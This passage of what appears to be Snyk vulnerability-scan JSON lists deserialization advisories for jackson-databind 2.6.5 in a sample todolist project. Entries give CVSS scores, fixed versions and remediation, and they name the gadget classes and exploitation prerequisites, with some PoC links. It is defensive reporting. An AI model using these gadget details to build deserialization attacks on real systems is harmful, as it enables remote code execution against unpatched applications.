"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be 